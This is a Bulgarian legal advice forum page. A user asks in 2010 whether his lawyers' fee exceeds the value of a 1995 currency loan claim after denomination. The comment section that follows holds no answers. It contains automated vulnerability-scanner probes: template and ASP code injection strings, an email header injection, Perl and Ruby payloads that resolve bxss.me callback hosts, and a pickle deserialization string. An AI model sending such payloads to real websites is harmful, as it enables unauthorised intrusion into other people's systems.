неправилно изчислен хонорар

11.07.2010г. 03:27:51
Здравейте, Моля да ми отговорите на следния въпрос: На 15.02.2006г.подписах Договор за правна помощ и платих възнаграждение- 3 600лв. на авокатите във връзка със завеждане на гражданско дело за събиране на дължими суми - 36 400 щ.д. и 17 400 ДМ по сключен договор за заем от 25.07. 1995г. Съгласно Договора за заем връщането на дължимите суми е следвало да стане на 25. 09. 1995г. На тази дата котировките на валутите на БНБ са били 47.73 лв. за 1 ДМ и 67.94 Щ.Д. или длъжника ми е дължал 3303518 лв. След деноминацията сумата става 3303.52лв. или при спечелване наделото бих взел по-малко от възнаграждението -3600 лв. Моля Ви да ми отговорите дали съм прав и какви са шансовете ако заведа дело. А.Господинов

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:24
${9999000+9999845}
lxbfYeaa
05.10.2023г. 07:24
lxbfYeaa
05.10.2023г. 07:24
&n978673=v912441
lxbfYeaa
05.10.2023г. 07:24
response.write(9791470*9278883)
lxbfYeaa
05.10.2023г. 07:24
'+response.write(9791470*9278883)+'
lxbfYeaa
05.10.2023г. 07:24
"+response.write(9791470*9278883)+"
lxbfYeaa
05.10.2023г. 07:24
bcc:009247.5555-63790.5555.cc922.19635.2@bxss.me
lxbfYeaa
05.10.2023г. 07:24
'.gethostbyname(lc('hitec'.'kznuidon6a2b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(89).chr(110).chr(89).'
lxbfYeaa
05.10.2023г. 07:24
"+"A".concat(70-3).concat(22*4).concat(107).concat(65).concat(108).concat(73)+(require"socket" Socket.gethostbyname("hitqt"+"sgepzqkw4defa.bxss.me.")[3].to_s)+"
lxbfYeaa
05.10.2023г. 07:24
ctime sleep p0 (I30 tp1 Rp2 .

Коментар